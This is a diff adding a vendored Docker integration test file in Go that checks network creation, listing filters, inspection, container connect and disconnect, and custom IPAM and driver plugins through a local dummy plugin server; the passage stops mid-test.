b/vendor/github.com/docker/docker/integration-cli/docker_cli_network_unix_test.go @@ -0,0 +1,1791 @@ +// +build !windows + +package main + +import ( + "encoding/json" + "fmt" + "io/ioutil" + "net" + "net/http" + "net/http/httptest" + "os" + "path/filepath" + "strings" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/versions/v1p20" + "github.com/docker/docker/pkg/integration/checker" + icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/runconfig" + "github.com/docker/libnetwork/driverapi" + remoteapi "github.com/docker/libnetwork/drivers/remote/api" + "github.com/docker/libnetwork/ipamapi" + remoteipam "github.com/docker/libnetwork/ipams/remote/api" + "github.com/docker/libnetwork/netlabel" + "github.com/go-check/check" + "github.com/vishvananda/netlink" +) + +const dummyNetworkDriver = "dummy-network-driver" +const dummyIPAMDriver = "dummy-ipam-driver" + +var remoteDriverNetworkRequest remoteapi.CreateNetworkRequest + +func init() { + check.Suite(&DockerNetworkSuite{ + ds: &DockerSuite{}, + }) +} + +type DockerNetworkSuite struct { + server *httptest.Server + ds *DockerSuite + d *Daemon +} + +func (s *DockerNetworkSuite) SetUpTest(c *check.C) { + s.d = NewDaemon(c) +} + +func (s *DockerNetworkSuite) TearDownTest(c *check.C) { + s.d.Stop() + s.ds.TearDownTest(c) +} + +func (s *DockerNetworkSuite) SetUpSuite(c *check.C) { + mux := http.NewServeMux() + s.server = httptest.NewServer(mux) + c.Assert(s.server, check.NotNil, check.Commentf("Failed to start an HTTP Server")) + setupRemoteNetworkDrivers(c, mux, s.server.URL, dummyNetworkDriver, dummyIPAMDriver) +} + +func setupRemoteNetworkDrivers(c *check.C, mux *http.ServeMux, url, netDrv, ipamDrv string) { + + mux.HandleFunc("/Plugin.Activate", func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintf(w, `{"Implements": ["%s", "%s"]}`, driverapi.NetworkPluginEndpointType, ipamapi.PluginEndpointType) + }) + + // Network driver implementation + mux.HandleFunc(fmt.Sprintf("/%s.GetCapabilities", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintf(w, `{"Scope":"local"}`) + }) + + mux.HandleFunc(fmt.Sprintf("/%s.CreateNetwork", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + err := json.NewDecoder(r.Body).Decode(&remoteDriverNetworkRequest) + if err != nil { + http.Error(w, "Unable to decode JSON payload: "+err.Error(), http.StatusBadRequest) + return + } + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintf(w, "null") + }) + + mux.HandleFunc(fmt.Sprintf("/%s.DeleteNetwork", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintf(w, "null") + }) + + mux.HandleFunc(fmt.Sprintf("/%s.CreateEndpoint", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintf(w, `{"Interface":{"MacAddress":"a0:b1:c2:d3:e4:f5"}}`) + }) + + mux.HandleFunc(fmt.Sprintf("/%s.Join", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + + veth := &netlink.Veth{ + LinkAttrs: netlink.LinkAttrs{Name: "randomIfName", TxQLen: 0}, PeerName: "cnt0"} + if err := netlink.LinkAdd(veth); err != nil { + fmt.Fprintf(w, `{"Error":"failed to add veth pair: `+err.Error()+`"}`) + } else { + fmt.Fprintf(w, `{"InterfaceName":{ "SrcName":"cnt0", "DstPrefix":"veth"}}`) + } + }) + + mux.HandleFunc(fmt.Sprintf("/%s.Leave", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintf(w, "null") + }) + + mux.HandleFunc(fmt.Sprintf("/%s.DeleteEndpoint", driverapi.NetworkPluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + if link, err := netlink.LinkByName("cnt0"); err == nil { + netlink.LinkDel(link) + } + fmt.Fprintf(w, "null") + }) + + // IPAM Driver implementation + var ( + poolRequest remoteipam.RequestPoolRequest + poolReleaseReq remoteipam.ReleasePoolRequest + addressRequest remoteipam.RequestAddressRequest + addressReleaseReq remoteipam.ReleaseAddressRequest + lAS = "localAS" + gAS = "globalAS" + pool = "172.28.0.0/16" + poolID = lAS + "/" + pool + gw = "172.28.255.254/16" + ) + + mux.HandleFunc(fmt.Sprintf("/%s.GetDefaultAddressSpaces", ipamapi.PluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + fmt.Fprintf(w, `{"LocalDefaultAddressSpace":"`+lAS+`", "GlobalDefaultAddressSpace": "`+gAS+`"}`) + }) + + mux.HandleFunc(fmt.Sprintf("/%s.RequestPool", ipamapi.PluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + err := json.NewDecoder(r.Body).Decode(&poolRequest) + if err != nil { + http.Error(w, "Unable to decode JSON payload: "+err.Error(), http.StatusBadRequest) + return + } + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + if poolRequest.AddressSpace != lAS && poolRequest.AddressSpace != gAS { + fmt.Fprintf(w, `{"Error":"Unknown address space in pool request: `+poolRequest.AddressSpace+`"}`) + } else if poolRequest.Pool != "" && poolRequest.Pool != pool { + fmt.Fprintf(w, `{"Error":"Cannot handle explicit pool requests yet"}`) + } else { + fmt.Fprintf(w, `{"PoolID":"`+poolID+`", "Pool":"`+pool+`"}`) + } + }) + + mux.HandleFunc(fmt.Sprintf("/%s.RequestAddress", ipamapi.PluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + err := json.NewDecoder(r.Body).Decode(&addressRequest) + if err != nil { + http.Error(w, "Unable to decode JSON payload: "+err.Error(), http.StatusBadRequest) + return + } + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + // make sure libnetwork is now querying on the expected pool id + if addressRequest.PoolID != poolID { + fmt.Fprintf(w, `{"Error":"unknown pool id"}`) + } else if addressRequest.Address != "" { + fmt.Fprintf(w, `{"Error":"Cannot handle explicit address requests yet"}`) + } else { + fmt.Fprintf(w, `{"Address":"`+gw+`"}`) + } + }) + + mux.HandleFunc(fmt.Sprintf("/%s.ReleaseAddress", ipamapi.PluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + err := json.NewDecoder(r.Body).Decode(&addressReleaseReq) + if err != nil { + http.Error(w, "Unable to decode JSON payload: "+err.Error(), http.StatusBadRequest) + return + } + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + // make sure libnetwork is now asking to release the expected address from the expected poolid + if addressRequest.PoolID != poolID { + fmt.Fprintf(w, `{"Error":"unknown pool id"}`) + } else if addressReleaseReq.Address != gw { + fmt.Fprintf(w, `{"Error":"unknown address"}`) + } else { + fmt.Fprintf(w, "null") + } + }) + + mux.HandleFunc(fmt.Sprintf("/%s.ReleasePool", ipamapi.PluginEndpointType), func(w http.ResponseWriter, r *http.Request) { + err := json.NewDecoder(r.Body).Decode(&poolReleaseReq) + if err != nil { + http.Error(w, "Unable to decode JSON payload: "+err.Error(), http.StatusBadRequest) + return + } + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") + // make sure libnetwork is now asking to release the expected poolid + if addressRequest.PoolID != poolID { + fmt.Fprintf(w, `{"Error":"unknown pool id"}`) + } else { + fmt.Fprintf(w, "null") + } + }) + + err := os.MkdirAll("/etc/docker/plugins", 0755) + c.Assert(err, checker.IsNil) + + fileName := fmt.Sprintf("/etc/docker/plugins/%s.spec", netDrv) + err = ioutil.WriteFile(fileName, []byte(url), 0644) + c.Assert(err, checker.IsNil) + + ipamFileName := fmt.Sprintf("/etc/docker/plugins/%s.spec", ipamDrv) + err = ioutil.WriteFile(ipamFileName, []byte(url), 0644) + c.Assert(err, checker.IsNil) +} + +func (s *DockerNetworkSuite) TearDownSuite(c *check.C) { + if s.server == nil { + return + } + + s.server.Close() + + err := os.RemoveAll("/etc/docker/plugins") + c.Assert(err, checker.IsNil) +} + +func assertNwIsAvailable(c *check.C, name string) { + if !isNwPresent(c, name) { + c.Fatalf("Network %s not found in network ls o/p", name) + } +} + +func assertNwNotAvailable(c *check.C, name string) { + if isNwPresent(c, name) { + c.Fatalf("Found network %s in network ls o/p", name) + } +} + +func isNwPresent(c *check.C, name string) bool { + out, _ := dockerCmd(c, "network", "ls") + lines := strings.Split(out, "\n") + for i := 1; i < len(lines)-1; i++ { + netFields := strings.Fields(lines[i]) + if netFields[1] == name { + return true + } + } + return false +} + +// assertNwList checks network list retrieved with ls command +// equals to expected network list +// note: out should be `network ls [option]` result +func assertNwList(c *check.C, out string, expectNws []string) { + lines := strings.Split(out, "\n") + var nwList []string + for _, line := range lines[1 : len(lines)-1] { + netFields := strings.Fields(line) + // wrap all network name in nwList + nwList = append(nwList, netFields[1]) + } + + // network ls should contains all expected networks + c.Assert(nwList, checker.DeepEquals, expectNws) +} + +func getNwResource(c *check.C, name string) *types.NetworkResource { + out, _ := dockerCmd(c, "network", "inspect", name) + nr := []types.NetworkResource{} + err := json.Unmarshal([]byte(out), &nr) + c.Assert(err, check.IsNil) + return &nr[0] +} + +func (s *DockerNetworkSuite) TestDockerNetworkLsDefault(c *check.C) { + defaults := []string{"bridge", "host", "none"} + for _, nn := range defaults { + assertNwIsAvailable(c, nn) + } +} + +func (s *DockerSuite) TestNetworkLsFormat(c *check.C) { + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "network", "ls", "--format", "{{.Name}}") + lines := strings.Split(strings.TrimSpace(string(out)), "\n") + + expected := []string{"bridge", "host", "none"} + var names []string + names = append(names, lines...) + c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with truncated names: %v, got: %v", expected, names)) +} + +func (s *DockerSuite) TestNetworkLsFormatDefaultFormat(c *check.C) { + testRequires(c, DaemonIsLinux) + + config := `{ + "networksFormat": "{{ .Name }} default" +}` + d, err := ioutil.TempDir("", "integration-cli-") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(d) + + err = ioutil.WriteFile(filepath.Join(d, "config.json"), []byte(config), 0644) + c.Assert(err, checker.IsNil) + + out, _ := dockerCmd(c, "--config", d, "network", "ls") + lines := strings.Split(strings.TrimSpace(string(out)), "\n") + + expected := []string{"bridge default", "host default", "none default"} + var names []string + names = append(names, lines...) + c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with truncated names: %v, got: %v", expected, names)) +} + +func (s *DockerNetworkSuite) TestDockerNetworkCreatePredefined(c *check.C) { + predefined := []string{"bridge", "host", "none", "default"} + for _, net := range predefined { + // predefined networks can't be created again + out, _, err := dockerCmdWithError("network", "create", net) + c.Assert(err, checker.NotNil, check.Commentf("%v", out)) + } +} + +func (s *DockerNetworkSuite) TestDockerNetworkCreateHostBind(c *check.C) { + dockerCmd(c, "network", "create", "--subnet=192.168.10.0/24", "--gateway=192.168.10.1", "-o", "com.docker.network.bridge.host_binding_ipv4=192.168.10.1", "testbind") + assertNwIsAvailable(c, "testbind") + + out, _ := runSleepingContainer(c, "--net=testbind", "-p", "5000:5000") + id := strings.TrimSpace(out) + c.Assert(waitRun(id), checker.IsNil) + out, _ = dockerCmd(c, "ps") + c.Assert(out, checker.Contains, "192.168.10.1:5000->5000/tcp") +} + +func (s *DockerNetworkSuite) TestDockerNetworkRmPredefined(c *check.C) { + predefined := []string{"bridge", "host", "none", "default"} + for _, net := range predefined { + // predefined networks can't be removed + out, _, err := dockerCmdWithError("network", "rm", net) + c.Assert(err, checker.NotNil, check.Commentf("%v", out)) + } +} + +func (s *DockerNetworkSuite) TestDockerNetworkLsFilter(c *check.C) { + testNet := "testnet1" + testLabel := "foo" + testValue := "bar" + out, _ := dockerCmd(c, "network", "create", "dev") + defer func() { + dockerCmd(c, "network", "rm", "dev") + dockerCmd(c, "network", "rm", testNet) + }() + networkID := strings.TrimSpace(out) + + // filter with partial ID + // only show 'dev' network + out, _ = dockerCmd(c, "network", "ls", "-f", "id="+networkID[0:5]) + assertNwList(c, out, []string{"dev"}) + + out, _ = dockerCmd(c, "network", "ls", "-f", "name=dge") + assertNwList(c, out, []string{"bridge"}) + + // only show built-in network (bridge, none, host) + out, _ = dockerCmd(c, "network", "ls", "-f", "type=builtin") + assertNwList(c, out, []string{"bridge", "host", "none"}) + + // only show custom networks (dev) + out, _ = dockerCmd(c, "network", "ls", "-f", "type=custom") + assertNwList(c, out, []string{"dev"}) + + // show all networks with filter + // it should be equivalent of ls without option + out, _ = dockerCmd(c, "network", "ls", "-f", "type=custom", "-f", "type=builtin") + assertNwList(c, out, []string{"bridge", "dev", "host", "none"}) + + out, _ = dockerCmd(c, "network", "create", "--label", testLabel+"="+testValue, testNet) + assertNwIsAvailable(c, testNet) + + out, _ = dockerCmd(c, "network", "ls", "-f", "label="+testLabel) + assertNwList(c, out, []string{testNet}) + + out, _ = dockerCmd(c, "network", "ls", "-f", "label="+testLabel+"="+testValue) + assertNwList(c, out, []string{testNet}) + + out, _ = dockerCmd(c, "network", "ls", "-f", "label=nonexistent") + outArr := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(outArr), check.Equals, 1, check.Commentf("%s\n", out)) + + out, _ = dockerCmd(c, "network", "ls", "-f", "driver=null") + assertNwList(c, out, []string{"none"}) + + out, _ = dockerCmd(c, "network", "ls", "-f", "driver=host") + assertNwList(c, out, []string{"host"}) + + out, _ = dockerCmd(c, "network", "ls", "-f", "driver=bridge") + assertNwList(c, out, []string{"bridge", "dev", testNet}) +} + +func (s *DockerNetworkSuite) TestDockerNetworkCreateDelete(c *check.C) { + dockerCmd(c, "network", "create", "test") + assertNwIsAvailable(c, "test") + + dockerCmd(c, "network", "rm", "test") + assertNwNotAvailable(c, "test") +} + +func (s *DockerNetworkSuite) TestDockerNetworkCreateLabel(c *check.C) { + testNet := "testnetcreatelabel" + testLabel := "foo" + testValue := "bar" + + dockerCmd(c, "network", "create", "--label", testLabel+"="+testValue, testNet) + assertNwIsAvailable(c, testNet) + + out, _, err := dockerCmdWithError("network", "inspect", "--format={{ .Labels."+testLabel+" }}", testNet) + c.Assert(err, check.IsNil) + c.Assert(strings.TrimSpace(out), check.Equals, testValue) + + dockerCmd(c, "network", "rm", testNet) + assertNwNotAvailable(c, testNet) +} + +func (s *DockerSuite) TestDockerNetworkDeleteNotExists(c *check.C) { + out, _, err := dockerCmdWithError("network", "rm", "test") + c.Assert(err, checker.NotNil, check.Commentf("%v", out)) +} + +func (s *DockerSuite) TestDockerNetworkDeleteMultiple(c *check.C) { + dockerCmd(c, "network", "create", "testDelMulti0") + assertNwIsAvailable(c, "testDelMulti0") + dockerCmd(c, "network", "create", "testDelMulti1") + assertNwIsAvailable(c, "testDelMulti1") + dockerCmd(c, "network", "create", "testDelMulti2") + assertNwIsAvailable(c, "testDelMulti2") + out, _ := dockerCmd(c, "run", "-d", "--net", "testDelMulti2", "busybox", "top") + containerID := strings.TrimSpace(out) + waitRun(containerID) + + // delete three networks at the same time, since testDelMulti2 + // contains active container, its deletion should fail. + out, _, err := dockerCmdWithError("network", "rm", "testDelMulti0", "testDelMulti1", "testDelMulti2") + // err should not be nil due to deleting testDelMulti2 failed. + c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) + // testDelMulti2 should fail due to network has active endpoints + c.Assert(out, checker.Contains, "has active endpoints") + assertNwNotAvailable(c, "testDelMulti0") + assertNwNotAvailable(c, "testDelMulti1") + // testDelMulti2 can't be deleted, so it should exist + assertNwIsAvailable(c, "testDelMulti2") +} + +func (s *DockerSuite) TestDockerNetworkInspect(c *check.C) { + out, _ := dockerCmd(c, "network", "inspect", "host") + networkResources := []types.NetworkResource{} + err := json.Unmarshal([]byte(out), &networkResources) + c.Assert(err, check.IsNil) + c.Assert(networkResources, checker.HasLen, 1) + + out, _ = dockerCmd(c, "network", "inspect", "--format={{ .Name }}", "host") + c.Assert(strings.TrimSpace(out), check.Equals, "host") +} + +func (s *DockerSuite) TestDockerNetworkInspectWithID(c *check.C) { + out, _ := dockerCmd(c, "network", "create", "test2") + networkID := strings.TrimSpace(out) + assertNwIsAvailable(c, "test2") + out, _ = dockerCmd(c, "network", "inspect", "--format={{ .Id }}", "test2") + c.Assert(strings.TrimSpace(out), check.Equals, networkID) + + out, _ = dockerCmd(c, "network", "inspect", "--format={{ .ID }}", "test2") + c.Assert(strings.TrimSpace(out), check.Equals, networkID) +} + +func (s *DockerSuite) TestDockerInspectMultipleNetwork(c *check.C) { + result := dockerCmdWithResult("network", "inspect", "host", "none") + c.Assert(result, icmd.Matches, icmd.Success) + + networkResources := []types.NetworkResource{} + err := json.Unmarshal([]byte(result.Stdout()), &networkResources) + c.Assert(err, check.IsNil) + c.Assert(networkResources, checker.HasLen, 2) + + // Should print an error, return an exitCode 1 *but* should print the host network + result = dockerCmdWithResult("network", "inspect", "host", "nonexistent") + c.Assert(result, icmd.Matches, icmd.Expected{ + ExitCode: 1, + Err: "Error: No such network: nonexistent", + Out: "host", + }) + + networkResources = []types.NetworkResource{} + err = json.Unmarshal([]byte(result.Stdout()), &networkResources) + c.Assert(networkResources, checker.HasLen, 1) + + // Should print an error and return an exitCode, nothing else + result = dockerCmdWithResult("network", "inspect", "nonexistent") + c.Assert(result, icmd.Matches, icmd.Expected{ + ExitCode: 1, + Err: "Error: No such network: nonexistent", + Out: "[]", + }) +} + +func (s *DockerSuite) TestDockerInspectNetworkWithContainerName(c *check.C) { + dockerCmd(c, "network", "create", "brNetForInspect") + assertNwIsAvailable(c, "brNetForInspect") + defer func() { + dockerCmd(c, "network", "rm", "brNetForInspect") + assertNwNotAvailable(c, "brNetForInspect") + }() + + out, _ := dockerCmd(c, "run", "-d", "--name", "testNetInspect1", "--net", "brNetForInspect", "busybox", "top") + c.Assert(waitRun("testNetInspect1"), check.IsNil) + containerID := strings.TrimSpace(out) + defer func() { + // we don't stop container by name, because we'll rename it later + dockerCmd(c, "stop", containerID) + }() + + out, _ = dockerCmd(c, "network", "inspect", "brNetForInspect") + networkResources := []types.NetworkResource{} + err := json.Unmarshal([]byte(out), &networkResources) + c.Assert(err, check.IsNil) + c.Assert(networkResources, checker.HasLen, 1) + container, ok := networkResources[0].Containers[containerID] + c.Assert(ok, checker.True) + c.Assert(container.Name, checker.Equals, "testNetInspect1") + + // rename container and check docker inspect output update + newName := "HappyNewName" + dockerCmd(c, "rename", "testNetInspect1", newName) + + // check whether network inspect works properly + out, _ = dockerCmd(c, "network", "inspect", "brNetForInspect") + newNetRes := []types.NetworkResource{} + err = json.Unmarshal([]byte(out), &newNetRes) + c.Assert(err, check.IsNil) + c.Assert(newNetRes, checker.HasLen, 1) + container1, ok := newNetRes[0].Containers[containerID] + c.Assert(ok, checker.True) + c.Assert(container1.Name, checker.Equals, newName) + +} + +func (s *DockerNetworkSuite) TestDockerNetworkConnectDisconnect(c *check.C) { + dockerCmd(c, "network", "create", "test") + assertNwIsAvailable(c, "test") + nr := getNwResource(c, "test") + + c.Assert(nr.Name, checker.Equals, "test") + c.Assert(len(nr.Containers), checker.Equals, 0) + + // run a container + out, _ := dockerCmd(c, "run", "-d", "--name", "test", "busybox", "top") + c.Assert(waitRun("test"), check.IsNil) + containerID := strings.TrimSpace(out) + + // connect the container to the test network + dockerCmd(c, "network", "connect", "test", containerID) + + // inspect the network to make sure container is connected + nr = getNetworkResource(c, nr.ID) + c.Assert(len(nr.Containers), checker.Equals, 1) + c.Assert(nr.Containers[containerID], check.NotNil) + + // check if container IP matches network inspect + ip, _, err := net.ParseCIDR(nr.Containers[containerID].IPv4Address) + c.Assert(err, check.IsNil) + containerIP := findContainerIP(c, "test", "test") + c.Assert(ip.String(), checker.Equals, containerIP) + + // disconnect container from the network + dockerCmd(c, "network", "disconnect", "test", containerID) + nr = getNwResource(c, "test") + c.Assert(nr.Name, checker.Equals, "test") + c.Assert(len(nr.Containers), checker.Equals, 0) + + // run another container + out, _ = dockerCmd(c, "run", "-d", "--net", "test", "--name", "test2", "busybox", "top") + c.Assert(waitRun("test2"), check.IsNil) + containerID = strings.TrimSpace(out) + + nr = getNwResource(c, "test") + c.Assert(nr.Name, checker.Equals, "test") + c.Assert(len(nr.Containers), checker.Equals, 1) + + // force disconnect the container to the test network + dockerCmd(c, "network", "disconnect", "-f", "test", containerID) + + nr = getNwResource(c, "test") + c.Assert(nr.Name, checker.Equals, "test") + c.Assert(len(nr.Containers), checker.Equals, 0) + + dockerCmd(c, "network", "rm", "test") + assertNwNotAvailable(c, "test") +} + +func (s *DockerNetworkSuite) TestDockerNetworkIPAMMultipleNetworks(c *check.C) { + // test0 bridge network + dockerCmd(c, "network", "create", "--subnet=192.168.0.0/16", "test1") + assertNwIsAvailable(c, "test1") + + // test2 bridge network does not overlap + dockerCmd(c, "network", "create", "--subnet=192.169.0.0/16", "test2") + assertNwIsAvailable(c, "test2") + + // for networks w/o ipam specified, docker will choose proper non-overlapping subnets + dockerCmd(c, "network", "create", "test3") + assertNwIsAvailable(c, "test3") + dockerCmd(c, "network", "create", "test4") + assertNwIsAvailable(c, "test4") + dockerCmd(c, "network", "create", "test5") + assertNwIsAvailable(c, "test5") + + // test network with multiple subnets + // bridge network doesn't support multiple subnets. hence, use a dummy driver that supports + + dockerCmd(c, "network", "create", "-d", dummyNetworkDriver, "--subnet=192.168.0.0/16", "--subnet=192.170.0.0/16", "test6") + assertNwIsAvailable(c, "test6") + + // test network with multiple subnets with valid ipam combinations + // also check same subnet across networks when the driver supports it. + dockerCmd(c, "network", "create", "-d", dummyNetworkDriver, + "--subnet=192.168.0.0/16", "--subnet=192.170.0.0/16", + "--gateway=192.168.0.100", "--gateway=192.170.0.100", + "--ip-range=192.168.1.0/24", + "--aux-address", "a=192.168.1.5", "--aux-address", "b=192.168.1.6", + "--aux-address", "c=192.170.1.5", "--aux-address", "d=192.170.1.6", + "test7") + assertNwIsAvailable(c, "test7") + + // cleanup + for i := 1; i < 8; i++ { + dockerCmd(c, "network", "rm", fmt.Sprintf("test%d", i)) + } +} + +func (s *DockerNetworkSuite) TestDockerNetworkCustomIPAM(c *check.C) { + // Create a bridge network using custom ipam driver + dockerCmd(c, "network", "create", "--ipam-driver", dummyIPAMDriver, "br0") + assertNwIsAvailable(c, "br0") + + // Verify expected network ipam fields are there + nr := getNetworkResource(c, "br0") + c.Assert(nr.Driver, checker.Equals, "bridge") + c.Assert(nr.IPAM.Driver, checker.Equals, dummyIPAMDriver) + + // remove network and exercise remote ipam driver + dockerCmd(c, "network", "rm", "br0") + assertNwNotAvailable(c, "br0") +} + +func (s *DockerNetworkSuite) TestDockerNetworkIPAMOptions(c *check.C) { + // Create a bridge network using custom ipam driver and options + dockerCmd(c, "network", "create", "--ipam-driver", dummyIPAMDriver, "--ipam-opt", "opt1=drv1", "--ipam-opt", "opt2=drv2", "br0") + assertNwIsAvailable(c, "br0") + + // Verify expected network ipam options + nr := getNetworkResource(c, "br0") + opts := nr.IPAM.Options + c.Assert(opts["opt1"], checker.Equals, "drv1") + c.Assert(opts["opt2"], checker.Equals, "drv2") +} + +func (s *DockerNetworkSuite) TestDockerNetworkInspectDefault(c *check.C) { + nr := getNetworkResource(c, "none") + c.Assert(nr.Driver, checker.Equals, "null") + c.Assert(nr.Scope, checker.Equals, "local") + c.Assert(nr.Internal, checker.Equals, false) + c.Assert(nr.EnableIPv6, checker.Equals, false) + c.Assert(nr.IPAM.Driver, checker.Equals, "default") + c.Assert(len(nr.IPAM.Config), checker.Equals, 0) + + nr = getNetworkResource(c, "host") + c.Assert(nr.Driver, checker.Equals, "host") + c.Assert(nr.Scope, checker.Equals, "local") + c.Assert(nr.Internal, checker.Equals, false) + c.Assert(nr.EnableIPv6, checker.Equals, false) + c.Assert(nr.IPAM.Driver, checker.Equals, "default") + c.Assert(len(nr.IPAM.Config), checker.Equals, 0) + + nr = getNetworkResource(c, "bridge") + c.Assert(nr.Driver, checker.Equals, "bridge") + c.Assert(nr.Scope, checker.Equals, "local") + c.Assert(nr.Internal, checker.Equals, false) + c.Assert(nr.EnableIPv6, checker.Equals, false) + c.Assert(nr.IPAM.Driver, checker.Equals, "default") + c.Assert(len(nr.IPAM.Config), checker.Equals, 1) + c.Assert(nr.IPAM.Config[0].Subnet, checker.NotNil) + c.Assert(nr.IPAM.Config[0].Gateway, checker.NotNil) +} + +func (s *DockerNetworkSuite) TestDockerNetworkInspectCustomUnspecified(c *check.C) { + // if unspecified, network subnet will be selected from inside preferred pool + dockerCmd(c, "network", "create", "test01") + assertNwIsAvailable(c, "test01") + + nr := getNetworkResource(c, "test01") + c.Assert(nr.Driver, checker.Equals, "bridge") + c.Assert(nr.Scope, checker.Equals, "local") + c.Assert(nr.Internal, checker.Equals, false) + c.Assert(nr.EnableIPv6, checker.Equals, false) + c.Assert(nr.IPAM.Driver, checker.Equals, "default") + c.Assert(len(nr.IPAM.Config), checker.Equals, 1) + c.Assert(nr.IPAM.Config[0].Subnet, checker.NotNil) + c.Assert(nr.IPAM.Config[0].Gateway, checker.NotNil) + + dockerCmd(c, "network", "rm", "test01") + assertNwNotAvailable(c, "test01") +} + +func (s *DockerNetworkSuite) TestDockerNetworkInspectCustomSpecified(c *check.C) { + dockerCmd(c, "network", "create", "--driver=bridge", "--ipv6", "--subnet=fd80:24e2:f998:72d6::/64", "--subnet=172.28.0.0/16", "--ip-range=172.28.5.0/24", "--gateway=172.28.5.254", "br0") + assertNwIsAvailable(c, "br0") + + nr := getNetworkResource(c, "br0") + c.Assert(nr.Driver, checker.Equals, "bridge") + c.Assert(nr.Scope, checker.Equals, "local") + c.Assert(nr.Internal, checker.Equals, false) + c.Assert(nr.EnableIPv6, checker.Equals, true) + c.Assert(nr.IPAM.Driver, checker.Equals, "default") + c.Assert(len(nr.IPAM.Config), checker.Equals, 2) + c.Assert(nr.IPAM.Config[0].Subnet, checker.Equals, "172.28.0.0/16") + c.Assert(nr.IPAM.Config[0].IPRange, checker.Equals, "172.28.5.0/24") + c.Assert(nr.IPAM.Config[0].Gateway, checker.Equals, "172.28.5.254") + c.Assert(nr.Internal, checker.False) + dockerCmd(c, "network", "rm", "br0") + assertNwNotAvailable(c, "test01") +} + +func (s *DockerNetworkSuite) TestDockerNetworkIPAMInvalidCombinations(c *check.C) { + // network with ip-range out of subnet range + _, _, err := dockerCmdWithError("network", "create", "--subnet=192.168.0.0/16", "--ip-range=192.170.0.0/16", "test") + c.Assert(err, check.NotNil) + + // network with multiple gateways for a single subnet + _, _, err = dockerCmdWithError("network", "create", "--subnet=192.168.0.0/16", "--gateway=192.168.0.1", "--gateway=192.168.0.2", "test") + c.Assert(err, check.NotNil) + + // Multiple overlapping subnets in the same network must fail + _, _, err = dockerCmdWithError("network", "create", "--subnet=192.168.0.0/16", "--subnet=192.168.1.0/16", "test") + c.Assert(err, check.NotNil) + + // overlapping subnets across networks must fail + // create a valid test0 network + dockerCmd(c, "network", "create", "--subnet=192.168.0.0/16", "test0") + assertNwIsAvailable(c, "test0") + // create an overlapping test1 network + _, _, err = dockerCmdWithError("network", "create", "--subnet=192.168.128.0/17", "test1") + c.Assert(err, check.NotNil) + dockerCmd(c, "network", "rm", "test0") + assertNwNotAvailable(c, "test0") +} + +func (s *DockerNetworkSuite) TestDockerNetworkDriverOptions(c *check.C) { + dockerCmd(c, "network", "create", "-d", dummyNetworkDriver, "-o", "opt1=drv1", "-o", "opt2=drv2", "testopt") + assertNwIsAvailable(c, "testopt") + gopts := remoteDriverNetworkRequest.Options[netlabel.GenericData] + c.Assert(gopts, checker.NotNil) + opts, ok := gopts.(map[string]interface{}) + c.Assert(ok, checker.Equals, true) + c.Assert(opts["opt1"], checker.Equals, "drv1") + c.Assert(opts["opt2"], checker.Equals, "drv2") + dockerCmd(c, "network", "rm", "testopt") + assertNwNotAvailable(c, "testopt") + +} + +func (s *DockerNetworkSuite) TestDockerPluginV2NetworkDriver(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64, Network) + + var ( + npName = "tiborvass/test-docker-netplugin" + npTag = "latest" + npNameWithTag = npName + ":" + npTag + ) + _, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", npNameWithTag) + c.Assert(err, checker.IsNil) + + out, _, err := dockerCmdWithError("plugin", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, npName) + c.Assert(out, checker.Contains, npTag) + c.Assert(out, checker.Contains, "true") + + dockerCmd(c, "network", "create", "-d", npNameWithTag, "v2net") + assertNwIsAvailable(c, "v2net") + dockerCmd(c, "network", "rm", "v2net") + assertNwNotAvailable(c, "v2net") + +} + +func (s *DockerDaemonSuite) TestDockerNetworkNoDiscoveryDefaultBridgeNetwork(c *check.C) { + testRequires(c, ExecSupport) + // On default bridge network built-in service discovery should not happen + hostsFile := "/etc/hosts" + bridgeName := "external-bridge" + bridgeIP := "192.169.255.254/24" + out, err := createInterface(c, "bridge", bridgeName, bridgeIP) + c.Assert(err, check.IsNil, check.Commentf(out)) + defer deleteInterface(c, bridgeName) + + err = s.d.StartWithBusybox("--bridge", bridgeName) + c.Assert(err, check.IsNil) + defer s.d.Restart() + + // run two containers and store first container's etc/hosts content + out, err = s.d.Cmd("run", "-d", "busybox", "top") + c.Assert(err, check.IsNil) + cid1 := strings.TrimSpace(out) + defer 